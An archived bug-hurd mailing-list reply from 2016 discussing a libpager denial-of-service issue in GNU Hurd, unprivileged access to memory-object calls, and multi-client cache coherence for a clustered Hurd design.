bug-hurd
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Denial of service attack via libpager


From: Brent W. Baccala
Subject: Re: Denial of service attack via libpager
Date: Mon, 29 Aug 2016 15:58:29 -1000


On Sun, Aug 28, 2016 at 11:15 PM, Richard Braun <rbraun@sceen.net> wrote:
On Sun, Aug 28, 2016 at 05:12:35PM -1000, Brent W. Baccala wrote:

> The obvious additional client would be a remote kernel, but as the exploit
> program that I posted shows, it could just as easily be an unprivileged
> process.  You don't need much permission to get a memory object, just read
> access on the file.

OK, this comes from the fact that io_map directly provides memory
objects indeed... Do we actually want to pass them around ? How
come calls like memory_object_init (specifically meant to be used
between the kernel and the pager) can be made from any client ?

Good question!

How could we authenticate the kernel to avoid unprivileged access?
 
The changes involved here are heavy, which is one reason we'd want
to avoid them. It also makes the system slightly slower by adding
a new layer of abstraction. So we may just want to support multiple
clients at the pager level, but I really don't see the benefit
other than "it works". You really need to justify why it's a good
thing that any unprivileged client is allowed to perform memory
object management calls...

I don't see why unprivileged clients should be able to participate in this protocol.

We need multi-client support so that multiple privileged clients can participate.

My goal is to build a single system image Hurd cluster.  We need to support multiple processes mmap'ing the same file, for basic POSIX compatibility.  If those processes are on different nodes, then the file server needs to handle multiple kernels as paging clients.
 
In addition, I've just thought about something else : if we handle
multiple clients, how do we make sure that two kernels, caching the
same file, don't just completely corrupt its content ? We'd need
some kind of cooperation to prevent the file being mapped more than
once I suppose, right ?

They can already do that with ordinary io_write's.  It's not that clients can trash the file if they don't have write access; they can't.  It's a denial of service issue.

Or, well, a complete cache coherence protocol, with a very large
overhead per operation.

That's what I'm talking about!

Let's think about the "very large overhead" for a minute.  If we've only got a single client, there's no extra overhead at all.  That's the case we've got now, so we're not losing anything.

If two processes on separate nodes have mmap'ed the same file with write permissions, you bet that could generate some very large overhead!  The programmer has to take that into account, and avoid using that technique in critical sections of code.

Yet it needs to be supported for POSIX compatibility, and in non-critical code it might not be a problem at all.  Two tasks could probably bat a 4KB page back and forth a hundred times and you'd never notice, just so long as they settled down and stopped doing it once they got initialized.

Furthermore, my reading of the memory_object protocol suggests that Mach's designers already had this in mind.  We don't need to design a cache coherence protocol, since we've already got one.  We just need to implement it.

    agape
    brent


reply via email to

[Prev in Thread] Current Thread [Next in Thread]